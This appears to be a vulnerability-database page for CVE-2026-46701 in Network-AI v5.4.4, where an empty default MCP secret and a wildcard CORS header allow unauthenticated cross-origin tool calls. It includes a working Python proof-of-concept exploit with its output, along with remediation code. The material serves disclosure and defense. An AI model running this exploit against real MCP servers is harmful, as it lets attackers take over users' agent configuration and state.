Network-AI CVE-2026-46701
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L
Lifecycle Timeline
2DescriptionGitHub Advisory
Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret
| Field | Value |
|---|---|
| Repository | Jovancoding/Network-AI |
| Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) |
Summary
The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request - no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools - including config_set, agent_spawn, and blackboard_write - against a default-configured localhost server.
Affected Code
bin/mcp-server.ts:89 - default secret resolves to empty string, enabling open access
secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',lib/mcp-transport-sse.ts:254 - auth guard short-circuits to true when secret is falsy
private _isAuthorized(req: http.IncomingMessage): boolean {
if (!this._opts.secret) return true;
const authHeader = req.headers['authorization'];
if (typeof authHeader !== 'string') return false;
const parts = authHeader.split(' ');
return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
}lib/mcp-transport-sse.ts:272 - wildcard CORS header applied unconditionally before any auth check
private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
// CORS - allow any MCP client to connect
res.setHeader('Access-Control-Allow-Origin', '*');
res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');lib/mcp-transport-sse.ts:367-368 - authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation
const rpc = JSON.parse(body) as McpJsonRpcRequest;
const response = await this._bridge.handleRPC(rpc);Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.
Proof of Concept
Environment
- Network-AI v5.4.4 (latest)
- Docker container bound to
127.0.0.1:3001 - Python 3 +
requests
poc.py
import sys
import requests
BASE = "http://127.0.0.1:3001"
# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
f"{BASE}/mcp",
headers={
"Origin": "http://evil.example.com",
"Access-Control-Request-Method": "POST",
"Access-Control-Request-Headers": "Content-Type",
},
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
print(f"RESULT: FAIL - expected ACAO='*', got {acao!r}")
sys.exit(1)
# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "config_set",
"arguments": {
"key": "maxParallelAgents",
"value": "999"
}
}
}
resp = requests.post(
f"{BASE}/mcp",
json=rpc_payload,
headers={
"Content-Type": "application/json",
"Origin": "http://evil.example.com",
# No Authorization header - exploiting empty-secret bypass
},
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
print(f"RESULT: FAIL - expected 200, got {resp.status_code}")
sys.exit(1)
body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
print(f"RESULT: FAIL - tool returned isError=true: {result_content}")
sys.exit(1)
# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
print(f"RESULT: FAIL - response ACAO not '*', browser would block read: {resp_acao!r}")
sys.exit(1)
print(f"RESULT: PASS - unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")Output
[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS - unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)Verified conditions
OPTIONS /mcp→ 204,Access-Control-Allow-Origin: *- browser preflight accepted by serverPOST /mcp(no Authorization header) → 200,isError: false-config_setexecuted without credentials- Response
Access-Control-Allow-Origin: *- response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page
Impact
Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).
Remediation
- Require a non-empty secret at startup: in
bin/mcp-server.ts, reject launch whenargs.secretis empty and--stdiois not set:
if (!args.secret && !args.stdio) {
console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.');
process.exit(1);
}- Restrict CORS to localhost origins only: in
lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist:
const origin = req.headers['origin'] ?? '';
const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin);
res.setHeader('Access-Control-Allow-Origin', allowed ? origin : '');
res.setHeader('Vary', 'Origin');- Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (
/sse) if cross-origin streaming is needed and not on/mcp.
AnalysisAI
Unauthenticated cross-origin MCP tool invocation in Network-AI v5.4.4 allows a remote attacker to lure a victim to a malicious web page that silently invokes any of the 22 exposed MCP tools (including config_set, agent_spawn, blackboard_write, and token_create/revoke) against the victim's locally running MCP SSE server. The vulnerability stems from an empty default secret combined with a wildcard CORS policy, and publicly available exploit code exists in the GHSA advisory demonstrating end-to-end exploitation. No CISA KEV listing yet and EPSS data was not provided, but the published PoC and trivial attack mechanics make this a meaningful risk for any user running the default Docker deployment.
Technical ContextAI
Network-AI is an npm-published TypeScript orchestration tool (pkg:npm/network-ai) that exposes a Model Context Protocol (MCP) Server-Sent Events transport on port 3001. Two defects compound into the vulnerability: bin/mcp-server.ts:89 resolves the bearer secret via process.env['NETWORK_AI_MCP_SECRET'] ?? '', and lib/mcp-transport-sse.ts:254 short-circuits _isAuthorized to return true whenever the configured secret is falsy. At the same time, lib/mcp-transport-sse.ts:272 unconditionally sets Access-Control-Allow-Origin: * before any auth check, meaning the response is readable by cross-origin browser scripts. This maps cleanly to CWE-346 (Origin Validation Error): the server fails to validate the origin of cross-domain requests and pairs it with broken authentication, letting any web page act on behalf of the local user against their MCP server.
RemediationAI
Vendor-released patch: 5.4.5 - upgrade the network-ai npm package to 5.4.5 or later (npm install network-ai@5.4.5) per the GHSA-j3vx-cx2r-pvg8 advisory. If immediate upgrade is not possible, set a strong NETWORK_AI_MCP_SECRET environment variable (or --secret <token> flag) before launching the server so _isAuthorized enforces bearer-token checks; note this only closes the empty-secret bypass and leaves the wildcard CORS in place, so cross-origin scripts can still attempt requests but will fail without the token. As additional hardening described in the advisory, restrict CORS to localhost origins by replacing the wildcard with an allowlist for http(s)://localhost or 127.0.0.1 and add Vary: Origin, and reorder the CORS headers to apply only after the auth check so rejected requests do not advertise cross-origin access; the trade-off is that any legitimate cross-origin MCP client will need to be added to the allowlist explicitly.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-346 – Origin Validation Error
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-j3vx-cx2r-pvg8